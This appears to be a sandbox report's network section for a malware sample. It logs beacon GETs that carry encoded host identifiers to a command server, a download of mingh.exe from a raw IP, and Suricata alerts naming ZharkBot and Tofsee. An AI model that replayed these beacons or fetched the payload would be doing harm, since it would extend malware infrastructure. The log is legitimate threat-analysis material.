Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
fusionflow-meta.net | 172.67.162.233 | |
GET 200 https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: fusionflow-meta.net
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:49:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=nf187jofkm9m1d5jk2124337ba; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DlRDStyiy5U0GnMkyn2o%2BjIta%2F%2BLggsxENXpVb92sm7qhFkkP7auJWuwkaQAfZQqfRvNNKkEIWIecnIxg8R5xEPpIQ89FTumgOQvLjpM7l%2FNVvvwwkiivb0%2B5VNQ%2B6F4OzS89fIQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b030ec4ec052ed0-LAX
alt-svc: h3=":443"; ma=86400

GET 200 https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: fusionflow-meta.net
Cache-Control: no-cache
Cookie: PHPSESSID=nf187jofkm9m1d5jk2124337ba

HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:49:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KihLEXAXKrBpw24%2FB2eXz4Wf22PBE299zPjZIo7ibGRHRtWQboNaA05ZYgQXrUwxA0KTkVG9mbv%2FRKCj72uiMxHJkuFtXNwl0dBLEwdLD6%2FYnPQsgao6jw89EIJlNiNFWG8jW3FB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b030edde9b7dbd9-LAX
alt-svc: h3=":443"; ma=86400

GET 200 https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: fusionflow-meta.net
Cache-Control: no-cache
Cookie: PHPSESSID=nf187jofkm9m1d5jk2124337ba

HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:50:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wc3fv5nUllrczad76sj%2B0QAuyc3MCkBxenq5NDCvrzJ7zSYp47jhV5Fy0HjaPmEOdQkr6PTjx%2FazxN%2B4%2FguZiAusRCDAPcMWZeWucqhtPvSuUUj5OOcudsUC5842E%2BmsWzauy113"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b03105a1c08dbd9-LAX
alt-svc: h3=":443"; ma=86400

GET 200 http://185.216.214.225/mingh.exe
GET /mingh.exe HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: 185.216.214.225
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:49:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 08 Aug 2024 20:19:08 GMT
ETag: "146e00-61f31bd3223c0"
Accept-Ranges: bytes
Content-Length: 1338880
Content-Type: application/x-msdos-program

ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49165 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49167 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2054413 | ET MALWARE ZharkBot User-Agent Observed | A Network Trojan was detected |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49165 -> 104.21.74.211:443 | C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
TLSv1 192.168.56.101:49167 -> 104.21.74.211:443 | C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
Snort Alerts
No Snort Alerts